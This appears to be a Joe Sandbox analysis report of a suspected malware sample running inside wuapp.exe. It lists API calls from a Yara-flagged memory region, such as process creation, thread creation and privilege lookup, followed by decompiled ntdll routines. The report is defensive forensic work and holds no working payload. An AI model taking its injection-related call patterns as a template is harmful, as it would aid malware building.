                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA724
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1C2,0009F1C2,?,00000000,?,?), ref: 000AA7F0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E01F88788(signed int __ecx, void* __edx, signed int _a4) {
                                                          				signed int _v8;
                                                          				short* _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				char _v44;
                                                          				signed int _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				char _v68;
                                                          				void* _t216;
                                                          				intOrPtr _t231;
                                                          				short* _t235;
                                                          				intOrPtr _t257;
                                                          				short* _t261;
                                                          				intOrPtr _t284;
                                                          				intOrPtr _t288;
                                                          				void* _t314;
                                                          				signed int _t318;
                                                          				short* _t319;
                                                          				intOrPtr _t321;
                                                          				void* _t328;
                                                          				void* _t329;
                                                          				char* _t332;
                                                          				signed int _t333;
                                                          				signed int* _t334;
                                                          				void* _t335;
                                                          				void* _t338;
                                                          				void* _t339;
                                                          
                                                          				_t328 = __edx;
                                                          				_t322 = __ecx;
                                                          				_t318 = 0;
                                                          				_t334 = _a4;
                                                          				_v8 = 0;
                                                          				_v28 = 0;
                                                          				_v48 = 0;
                                                          				_v20 = 0;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v52 = 0;
                                                          				if(_t334 == 0) {
                                                          					_t329 = 0xc000000d;
                                                          					L49:
                                                          					_t334[0x11] = _v56;
                                                          					 *_t334 =  *_t334 | 0x00000800;
                                                          					_t334[0x12] = _v60;
                                                          					_t334[0x13] = _v28;
                                                          					_t334[0x17] = _v20;
                                                          					_t334[0x16] = _v48;
                                                          					_t334[0x18] = _v40;
                                                          					_t334[0x14] = _v32;
                                                          					_t334[0x15] = _v52;
                                                          					return _t329;
                                                          				}
                                                          				_v56 = 0;
                                                          				if(E01F88460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                          					_v56 = 1;
                                                          					if(_v8 != 0) {
                                                          						_t207 = E01F6E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                          					}
                                                          					_push(1);
                                                          					_v8 = _t318;
                                                          					E01F8718A(_t207);
                                                          					_t335 = _t335 + 4;
                                                          				}
                                                          				_v60 = _v60 | 0xffffffff;
                                                          				if(E01F88460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                          					_t333 =  *_v8;
                                                          					_v60 = _t333;
                                                          					_t314 = E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                          					_push(_t333);
                                                          					_v8 = _t318;
                                                          					E01F8718A(_t314);
                                                          					_t335 = _t335 + 4;
                                                          				}
                                                          				_t216 = E01F88460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                          				_t332 = ";";
                                                          				if(_t216 < 0) {
                                                          					L17:
                                                          					if(E01F88460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                          						L30:
                                                          						if(E01F88460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                          							L46:
                                                          							_t329 = 0;
                                                          							L47:
                                                          							if(_v8 != _t318) {
                                                          								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                          							}
                                                          							if(_v28 != _t318) {
                                                          								if(_v20 != _t318) {
                                                          									E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                          									_v20 = _t318;
                                                          									_v40 = _t318;
                                                          								}
                                                          							}
                                                          							goto L49;
                                                          						}
                                                          						_t231 = _v24;
                                                          						_t322 = _t231 + 4;
                                                          						_push(_t231);
                                                          						_v52 = _t322;
                                                          						E01F8718A(_t231);
                                                          						if(_t322 == _t318) {
                                                          							_v32 = _t318;
                                                          						} else {
                                                          							_v32 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                          						}
                                                          						if(_v32 == _t318) {
                                                          							_v52 = _t318;
                                                          							L58:
                                                          							_t329 = 0xc0000017;
                                                          							goto L47;
                                                          						} else {
                                                          							E01F62340(_v32, _v8, _v24);
                                                          							_v16 = _v32;
                                                          							_a4 = _t318;
                                                          							_t235 = E01F7E679(_v32, _t332);
                                                          							while(1) {
                                                          								_t319 = _t235;
                                                          								if(_t319 == 0) {
                                                          									break;
                                                          								}
                                                          								 *_t319 = 0;
                                                          								_t321 = _t319 + 2;
                                                          								E01F6E2A8(_t322,  &_v68, _v16);
                                                          								if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          									_a4 = _a4 + 1;
                                                          								}
                                                          								_v16 = _t321;
                                                          								_t235 = E01F7E679(_t321, _t332);
                                                          								_pop(_t322);
                                                          							}
                                                          							_t236 = _v16;
                                                          							if( *_v16 != _t319) {
                                                          								E01F6E2A8(_t322,  &_v68, _t236);
                                                          								if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          									_a4 = _a4 + 1;
                                                          								}
                                                          							}
                                                          							if(_a4 == 0) {
                                                          								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                          								_v52 = _v52 & 0x00000000;
                                                          								_v32 = _v32 & 0x00000000;
                                                          							}
                                                          							if(_v8 != 0) {
                                                          								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                          							}
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t318 = 0;
                                                          							goto L46;
                                                          						}
                                                          					}
                                                          					_t257 = _v24;
                                                          					_t322 = _t257 + 4;
                                                          					_push(_t257);
                                                          					_v40 = _t322;
                                                          					E01F8718A(_t257);
                                                          					_t338 = _t335 + 4;
                                                          					if(_t322 == _t318) {
                                                          						_v20 = _t318;
                                                          					} else {
                                                          						_v20 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                          					}
                                                          					if(_v20 == _t318) {
                                                          						_v40 = _t318;
                                                          						goto L58;
                                                          					} else {
                                                          						E01F62340(_v20, _v8, _v24);
                                                          						_v16 = _v20;
                                                          						_a4 = _t318;
                                                          						_t261 = E01F7E679(_v20, _t332);
                                                          						_t335 = _t338 + 0x14;
                                                          						while(1) {
                                                          							_v12 = _t261;
                                                          							if(_t261 == _t318) {
                                                          								break;
                                                          							}
                                                          							_v12 = _v12 + 2;
                                                          							 *_v12 = 0;
                                                          							E01F6E2A8(_v12,  &_v68, _v16);
                                                          							if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          								_a4 = _a4 + 1;
                                                          							}
                                                          							_v16 = _v12;
                                                          							_t261 = E01F7E679(_v12, _t332);
                                                          							_pop(_t322);
                                                          						}
                                                          						_t269 = _v16;
                                                          						if( *_v16 != _t318) {
                                                          							E01F6E2A8(_t322,  &_v68, _t269);
                                                          							if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          								_a4 = _a4 + 1;
                                                          							}
                                                          						}
                                                          						if(_a4 == _t318) {
                                                          							E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                          							_v40 = _t318;
                                                          							_v20 = _t318;
                                                          						}
                                                          						if(_v8 != _t318) {
                                                          							E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                          						}
                                                          						_v8 = _t318;
                                                          						goto L30;
                                                          					}
                                                          				}
                                                          				_t284 = _v24;
                                                          				_t322 = _t284 + 4;
                                                          				_push(_t284);
                                                          				_v48 = _t322;
                                                          				E01F8718A(_t284);
                                                          				_t339 = _t335 + 4;
                                                          				if(_t322 == _t318) {
                                                          					_v28 = _t318;
                                                          				} else {
                                                          					_v28 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                          				}
                                                          				if(_v28 == _t318) {
                                                          					_v48 = _t318;
                                                          					goto L58;
                                                          				} else {
                                                          					E01F62340(_v28, _v8, _v24);
                                                          					_v16 = _v28;
                                                          					_a4 = _t318;
                                                          					_t288 = E01F7E679(_v28, _t332);
                                                          					_t335 = _t339 + 0x14;
                                                          					while(1) {
                                                          						_v12 = _t288;
                                                          						if(_t288 == _t318) {
                                                          							break;
                                                          						}
                                                          						_v12 = _v12 + 2;
                                                          						 *_v12 = 0;
                                                          						E01F6E2A8(_v12,  &_v68, _v16);
                                                          						if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          							_a4 = _a4 + 1;
                                                          						}
                                                          						_v16 = _v12;
                                                          						_t288 = E01F7E679(_v12, _t332);
                                                          						_pop(_t322);
                                                          					}
                                                          					_t296 = _v16;
                                                          					if( *_v16 != _t318) {
                                                          						E01F6E2A8(_t322,  &_v68, _t296);
                                                          						if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
                                                          							_a4 = _a4 + 1;
                                                          						}
                                                          					}
                                                          					if(_a4 == _t318) {
                                                          						E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                          						_v48 = _t318;
                                                          						_v28 = _t318;
                                                          					}
                                                          					if(_v8 != _t318) {
                                                          						E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                          					}
                                                          					_v8 = _t318;
                                                          					goto L17;
                                                          				}
                                                          			}





































                                                          0x01f8886c
                                                          0x01f8886c
                                                          0x01f88872
                                                          0x01fd1b0e
                                                          0x00000000
                                                          0x01f88878
                                                          0x01f88881
                                                          0x01f8888b
                                                          0x01f8888e
                                                          0x01f88891
                                                          0x01f88896
                                                          0x01f88899
                                                          0x01f88899
                                                          0x01f8889e
                                                          0x00000000
                                                          0x00000000
                                                          0x01fd1b21
                                                          0x01fd1b27
                                                          0x01fd1b2e
                                                          0x01fd1b42
                                                          0x01fd1b44
                                                          0x01fd1b44
                                                          0x01fd1b4c
                                                          0x01fd1b4f
                                                          0x01fd1b55
                                                          0x01fd1b55
                                                          0x01f888a4
                                                          0x01f888aa
                                                          0x01f888b1
                                                          0x01f888c5
                                                          0x01fd1b5b
                                                          0x01fd1b5b
                                                          0x01f888c5
                                                          0x01f888ce
                                                          0x01f888e0
                                                          0x01f888e5
                                                          0x01f888e8
                                                          0x01f888e8
                                                          0x01f888ee
                                                          0x01f88900
                                                          0x01f88900
                                                          0x01f88905
                                                          0x00000000
                                                          0x01f88905

                                                          APIs
                                                          Strings
                                                          • WindowsExcludedProcs, xrefs: 01F887C1
                                                          • Kernel-MUI-Language-Allowed, xrefs: 01F88827
                                                          • Kernel-MUI-Language-SKU, xrefs: 01F889FC
                                                          • Kernel-MUI-Number-Allowed, xrefs: 01F887E6
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01F88914
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: _wcspbrk
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 402402107-258546922
                                                          • Opcode ID: 929f4d33884f1269310e6b8266e6aa8f933779e2d49437744814c70e88a5eccd
                                                          • Instruction ID: 78c96abd71a814f8ebc4dfb36425bdd3f79c507f0bc2d3898e0cd305fc2334f3
                                                          • Opcode Fuzzy Hash: 929f4d33884f1269310e6b8266e6aa8f933779e2d49437744814c70e88a5eccd
                                                          • Instruction Fuzzy Hash: 6DF109B6D0020AEFDF11EF98CD809EEBBB9FF18300F54446AE505A7211E7369A45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E01FA13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr* _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				intOrPtr _t71;
                                                          				signed int _t78;
                                                          				signed int _t86;
                                                          				char _t90;
                                                          				signed int _t91;
                                                          				signed int _t96;
                                                          				intOrPtr _t108;
                                                          				signed int _t114;
                                                          				void* _t115;
                                                          				intOrPtr _t128;
                                                          				intOrPtr* _t129;
                                                          				void* _t130;
                                                          
                                                          				_t129 = _a4;
                                                          				_t128 = _a8;
                                                          				_t116 = 0;
                                                          				_t71 = _t128 + 0x5c;
                                                          				_v8 = 8;
                                                          				_v20 = _t71;
                                                          				if( *_t129 == 0) {
                                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                          						goto L5;
                                                          					} else {
                                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                          						if(_t96 != 0) {
                                                          							L38:
                                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                          								goto L5;
                                                          							} else {
                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                          								_t86 = E01F97707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                          								L36:
                                                          								return _t128 + _t86 * 2;
                                                          							}
                                                          						}
                                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                          						if(_t114 == 0) {
                                                          							L33:
                                                          							_t115 = 0x1f62926;
                                                          							L35:
                                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                                          							_t86 = E01F97707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                          							goto L36;
                                                          						}
                                                          						if(_t114 != 0xffff) {
                                                          							_t116 = 0;
                                                          							goto L38;
                                                          						}
                                                          						if(_t114 != 0) {
                                                          							_t115 = 0x1f69cac;
                                                          							goto L35;
                                                          						}
                                                          						goto L33;
                                                          					}
                                                          				} else {
                                                          					L5:
                                                          					_a8 = _t116;
                                                          					_a4 = _t116;
                                                          					_v12 = _t116;
                                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                                          							_v8 = 6;
                                                          						}
                                                          					}
                                                          					_t90 = _v8;
                                                          					if(_t90 <= _t116) {
                                                          						L11:
                                                          						if(_a8 - _a4 <= 1) {
                                                          							_a8 = _t116;
                                                          							_a4 = _t116;
                                                          						}
                                                          						_t91 = 0;
                                                          						if(_v8 <= _t116) {
                                                          							L22:
                                                          							if(_v8 < 8) {
                                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                                          								_t128 = _t128 + E01F97707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                          							}
                                                          							return _t128;
                                                          						} else {
                                                          							L14:
                                                          							L14:
                                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                                          								if(_t91 != _t116 && _t91 != _a8) {
                                                          									_push(":");
                                                          									_push(_t71 - _t128 >> 1);
                                                          									_push(_t128);
                                                          									_t128 = _t128 + E01F97707() * 2;
                                                          									_t71 = _v20;
                                                          									_t130 = _t130 + 0xc;
                                                          								}
                                                          								_t78 = E01F97707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                          								_t130 = _t130 + 0x10;
                                                          							} else {
                                                          								_push(L"::");
                                                          								_push(_t71 - _t128 >> 1);
                                                          								_push(_t128);
                                                          								_t78 = E01F97707();
                                                          								_t130 = _t130 + 0xc;
                                                          								_t91 = _a8 - 1;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							_t128 = _t128 + _t78 * 2;
                                                          							_t71 = _v20;
                                                          							if(_t91 >= _v8) {
                                                          								goto L22;
                                                          							}
                                                          							_t116 = 0;
                                                          							goto L14;
                                                          						}
                                                          					} else {
                                                          						_t108 = 1;
                                                          						_v16 = _t129;
                                                          						_v24 = _t90;
                                                          						do {
                                                          							if( *_v16 == _t116) {
                                                          								if(_t108 - _v12 > _a8 - _a4) {
                                                          									_a4 = _v12;
                                                          									_a8 = _t108;
                                                          								}
                                                          								_t116 = 0;
                                                          							} else {
                                                          								_v12 = _t108;
                                                          							}
                                                          							_v16 = _v16 + 2;
                                                          							_t108 = _t108 + 1;
                                                          							_t26 =  &_v24;
                                                          							 *_t26 = _v24 - 1;
                                                          						} while ( *_t26 != 0);
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          			}





















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: ea268374a3e9c8727c0a6655d7fc3b0a48c0bbacc6cc2e9520b752e40bbd6f9b
                                                          • Instruction ID: 562db831319bcd39237175ce6291b0a2ebc42fd8cda9fec631ca5741cfd188c7
                                                          • Opcode Fuzzy Hash: ea268374a3e9c8727c0a6655d7fc3b0a48c0bbacc6cc2e9520b752e40bbd6f9b
                                                          • Instruction Fuzzy Hash: 676153B1D08756EADF34DF5DC8808BEBBB9EF95300B84C12DE9D647641D23AA640CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E01F97EFD(void* __ecx, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				char _v540;
                                                          				unsigned int _v544;
                                                          				signed int _v548;
                                                          				intOrPtr _v552;
                                                          				char _v556;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t33;
                                                          				void* _t38;
                                                          				unsigned int _t46;
                                                          				unsigned int _t47;
                                                          				unsigned int _t52;
                                                          				intOrPtr _t56;
                                                          				unsigned int _t62;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				intOrPtr _t72;
                                                          				signed int _t73;
                                                          				void* _t74;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          				void* _t77;
                                                          
                                                          				_t33 =  *0x2042088; // 0x768eee31
                                                          				_v8 = _t33 ^ _t73;
                                                          				_v548 = _v548 & 0x00000000;
                                                          				_t72 = _a4;
                                                          				if(E01F97F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                          					__eflags = _v548;
                                                          					if(_v548 == 0) {
                                                          						goto L1;
                                                          					}
                                                          					_t62 = _t72 + 0x24;
                                                          					E01FB3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                          					_t71 = 0x214;
                                                          					_v544 = 0x214;
                                                          					E01F6DFC0( &_v540, 0, 0x214);
                                                          					_t75 = _t74 + 0x20;
                                                          					_t46 =  *0x2044218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                          					__eflags = _t46;
                                                          					if(_t46 == 0) {
                                                          						goto L1;
                                                          					}
                                                          					_t47 = _v544;
                                                          					__eflags = _t47;
                                                          					if(_t47 == 0) {
                                                          						goto L1;
                                                          					}
                                                          					__eflags = _t47 - 0x214;
                                                          					if(_t47 >= 0x214) {
                                                          						goto L1;
                                                          					}
                                                          					_push(_t62);
                                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                          					E01FB3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                          					_t52 = E01F70D27( &_v540, L"Execute=1");
                                                          					_t76 = _t75 + 0x1c;
                                                          					_push(_t62);
                                                          					__eflags = _t52;
                                                          					if(_t52 == 0) {
                                                          						E01FB3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                          						_t71 =  &_v540;
                                                          						_t56 = _t73 + _v544 - 0x218;
                                                          						_t77 = _t76 + 0x14;
                                                          						_v552 = _t56;
                                                          						__eflags = _t71 - _t56;
                                                          						if(_t71 >= _t56) {
                                                          							goto L1;
                                                          						} else {
                                                          							goto L10;
                                                          						}
                                                          						while(1) {
                                                          							L10:
                                                          							_t62 = E01F78375(_t71, 0x20);
                                                          							_pop(_t69);
                                                          							__eflags = _t62;
                                                          							if(__eflags != 0) {
                                                          								__eflags = 0;
                                                          								 *_t62 = 0;
                                                          							}
                                                          							E01FB3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                          							_t77 = _t77 + 0x10;
                                                          							E01FDE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                          							__eflags = _t62;
                                                          							if(_t62 == 0) {
                                                          								goto L1;
                                                          							}
                                                          							_t31 = _t62 + 2; // 0x2
                                                          							_t71 = _t31;
                                                          							__eflags = _t71 - _v552;
                                                          							if(_t71 >= _v552) {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          					}
                                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                          					_push(3);
                                                          					_push(0x55);
                                                          					E01FB3F92();
                                                          					_t38 = 1;
                                                          					L2:
